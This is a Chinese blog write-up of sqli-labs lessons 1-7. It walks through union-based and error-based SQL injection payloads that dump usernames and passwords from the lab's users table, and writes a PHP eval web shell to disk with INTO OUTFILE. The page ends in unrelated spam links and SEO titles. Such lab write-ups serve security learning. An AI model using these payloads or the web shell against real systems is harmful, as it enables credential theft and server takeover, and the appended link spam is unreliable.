当前位置: 首页 > wzjs >正文

吉利网站建设建设项目环评在什么网站公示

wzjs 2025/9/10 23:08:58
吉利网站建设,建设项目环评在什么网站公示,2013网站建设方案,天津网站建设公司哪家好没了解sql注入的知识,本篇更像是复现 数据库层面 │ ├── 数据库1(Database 1) │ │ ├── 表1(Table 1) │ │ │ ├── 主键字段(Primary Key):唯一标识表中的每…

没了解sql注入的知识,本篇更像是复现

数据库层面
│   ├── 数据库1(Database 1)
│   │   ├── 表1(Table 1)
│   │   │   ├── 主键字段(Primary Key):唯一标识表中的每一行。
│   │   │   ├── 字段2(Field 2):存储不同类型的数据,如字符串、数字、日期等。
│   │   │   │   ├── 数据类型(Data Type):定义字段可以存储的数据类型。
│   │   │   │   └── 约束条件(Constraints):限制字段的值,如唯一、非空、检查等。
│   │   │   └── 数据记录(Data Records):表中的具体数据,由行和列组成。
│   │   ├── 表2(Table 2)
│   │   │   ├── 字段结构(Field Structure):定义表的结构和字段属性。
│   │   │   └── 外键(Foreign Key):建立表与表之间的关系,确保数据的完整性。
│   │   └── 视图(View)
│   │       ├── 虚拟表(Virtual Table):基于一个或多个基础表的查询结果。
│   │       └── 视图定义(View Definition):定义视图的查询语句和权限。
│   ├── 数据库2(Database 2)
│   │   ├── 存储过程(Stored Procedures):预编译的SQL语句,可重复使用。
│   │   ├── 函数(Functions):执行特定任务并返回结果。
│   │   └── 触发器(Triggers):在特定事件发生时自动执行的操作。
│   └── 系统数据库(System Database)
│       ├── 信息存储(Information Storage):存储数据库元数据和系统配置。
│       ├── 系统表(System Tables):定义数据库的结构和状态。
│       └── 日志表(Log Tables):记录数据库的操作和错误信息。

数据库结构大致是库~表~字段

mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,这个数据库下有两个表tables和columns,tables有table_name和table_schema两个字段,其中table_name字段下面是所有数据库存在的表名 ‘所有数据库——>表名’,table_schema字段下是所有表名对应的数据库名‘所有表名——>数据库名’;columns有colum_name和columns_schema两个字段,其中colum_name字段下是所有数据库存在的字段名所有数据库——>字段名,columns_schema字段下是所有表名对应的数据库‘所有表名——>数据库’

如何判断是字符型注入还是数字型注入_怎么判断是字符型注入还是数字型注入-CSDN博客

1

提示输入id,上传id=1

判断sql语句是否是拼接,且是字符型还是数字型

可以看到加'的时候报错了,所以sql语句要是字符型的,使用联合查询,联合查询就是两个sql语句一起查询,两张表具有相同的列数,且字段名是一样的。

判断是否存在sql注入,先尝试闭合看看是否报错,使用id=1' order by 3--+查列名

继续查第四列发现报错了

说明只有3列,也可以用id=1' union select 1,2,3,4 --+去查列表,这样可以一键查出来有多少列。

接着查账号密码属于多少列,使用?id=-1' union select 1,2,3 --+

可以看到name在2列,密码在3列,接着使用?id=-1'union select1,database(),version()--+看数据名和版本名

得到名称是security,利用information_schema.tables数据库查询库中所以的表和列

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容

通过查询,我们得到了四个表名,猜测信息可能在user里面,接下来爆字段名

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name

得到了两个字段,从名称上看应该是账号密码

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

加上id隔开账号密码,查询这两个字段的内容

2

先判断类型?id=1'

显然是数字型,不存在联合拼接查列表?id=1 union select 1,2,3,4 --+

查属于多少列?id=-1 union select 1,2,3 --+

name在2,passwd在3,查数据名和版本?id=-1 union select 1,database(),version()

数据名叫security,暴库?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

还是在user,爆字段名?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

和上一关一样,查询username和password

?id=-1 union select 1,2,group_concat(username ,id , password) from users

3

?id=1 and 1=1

?id=1 and 1=2

?id=1’ and ‘1’='1

是字符型注入

wp中使用?id=2')--+

?id=2'

报错,说明sql语句是引号字符型且有括号

查列表?id=1')union select 1,2,3--+

有三个列表,查库名和版本名?id=-1') union select 1,database(),version()--+

一样的名称,暴库?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

同样是在user

爆字段名?id=-1')union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询账号密码?id=-1')union select 1,2,group_concat(username ,id , password) from users--+


4

?id=1") order by 3--+

区别于上一关的,这关是双引号字符型,带括号

查列表?id=1")union select 1,2,3--+

查库名和版本名?id=-1") union select 1,database(),version()--+

暴库?id=-1")union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆字段名?id=-1")union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询账号密码?id=-1")union select 1,2,group_concat(username ,id , password) from users--+

 5

单引号闭合型,且列表数为3

列表数为3,使用上面的办法显然是不行的,可以看到查询id的时候出来的不是账号密码,而是一串字符串,没有其他的显示,这时候用到布尔盲注,用到length(),ascii() ,substr()这三个函数

或者报错盲注,报错注入主要用extractvalue,updateml,floor函数

使用报错盲注

?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

暴库?id=1' union select extractvalue(1,concat('~','~',database())) -- a

爆表?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~')) -- a

爆数据?id=1' and extractvalue(1,concat('~',(select group_concat(username) from security.users),'~')) -- a

前后看了几个wp,发现不论我怎么注入返回的画面都是这个画面,但是步骤就是上面那个

6

id=1' order by 4 --+

id=1" order by 4 --+

这题相较于上一题显然是双引号闭合型,其余都一样

7

多次尝试闭合类型,是'))闭合

提示输出文件,使用?id=1')) union select 1,'<?php @eval($_POST["456"]);?>',3 into outfile "E:\\phpstudy_pro\\www\\sqli-labs\\Less-7\\m456.php" -- a将木马写入

使用蚁剑连接

8


文章转载自:

http://o2M80LHs.ybyLn.cn
http://qIrpcKL4.ybyLn.cn
http://gGApvIQz.ybyLn.cn
http://pMtJPeud.ybyLn.cn
http://4Bwu35vi.ybyLn.cn
http://apHYD8NB.ybyLn.cn
http://c0Zovhxt.ybyLn.cn
http://DPrIOsI6.ybyLn.cn
http://0JaQcjT3.ybyLn.cn
http://LJaha2Vt.ybyLn.cn
http://ZhikaEXd.ybyLn.cn
http://d4Kx1NS8.ybyLn.cn
http://mxdJQqDG.ybyLn.cn
http://O1hOR7SL.ybyLn.cn
http://DzO7xFsx.ybyLn.cn
http://sHt2ufJo.ybyLn.cn
http://M8jvRAoI.ybyLn.cn
http://NeBXo23h.ybyLn.cn
http://cnsnGkBr.ybyLn.cn
http://rVdYRNsU.ybyLn.cn
http://z0vTp6cm.ybyLn.cn
http://2UzzifPO.ybyLn.cn
http://mnKSKYcu.ybyLn.cn
http://mTzOSIiU.ybyLn.cn
http://LibftHle.ybyLn.cn
http://MWcLe4Ce.ybyLn.cn
http://tvwvNrce.ybyLn.cn
http://lJFA45pQ.ybyLn.cn
http://rZ8zfJBf.ybyLn.cn
http://FaB0GVmx.ybyLn.cn
http://www.dtcms.com/wzjs/685639.html

相关文章:

  • 昆明网站建设猫咪亚马逊aws永久免费服务器
  • 朋友做的网站图片不显示不出来的自适应h5网站
  • ps 制作网站网站建设工期安排表
  • 成都手机网站制作丹阳做公司网站的
  • 江镇做包子网站娱乐网站怎么制作
  • 南宁最高端网站建设网站访问流程设计
  • 修改网站首页排序谷歌搜索引擎怎么才能用
  • 进行企业网站建设规划wordpress 热门搜索
  • 常德市住房和城市建设局网站网站做留言板怎么清空源码
  • app软件网站开发网站建站公司有必要做吗
  • 企业网站建设与网页制作网站开发开发小游戏吗
  • 庄河做网站二手站网站怎做
  • 免费有限公司网站宁波seo网络推广
  • 网站制作 招聘太仓网站公司
  • pc蛋蛋网站开发做直播信号网站
  • 网页图片批量下载优化网站排名怎么制作
  • 有关图书网站建设策划书做网站v1认证是什么意思
  • 手机上网自动跳转网站建设摩托车价格大全
  • 网站建设与推广销售户话术网站设计模版免费下载
  • 外包公司做的网站wordpress文章修改失败
  • 网站收录查询代码哪里有建设网站中的视频下载
  • 优质校建设专题网站网站建设初稿
  • 大型的平台类网站建设需要多少资金上海公司排名前十
  • 做网站平台多少钱阳江网络问政平台下载
  • 网站建设毕业设计模板百度域名值多少钱
  • python flask做网站西充企业网站建设
  • 校友会网站建设医院网站建设
  • 绵阳网站托管wordpress 无法播放音乐
  • 电商网站建设概念龙岩app定制开发
  • 网站视频主持人制作电子商务网站建设过程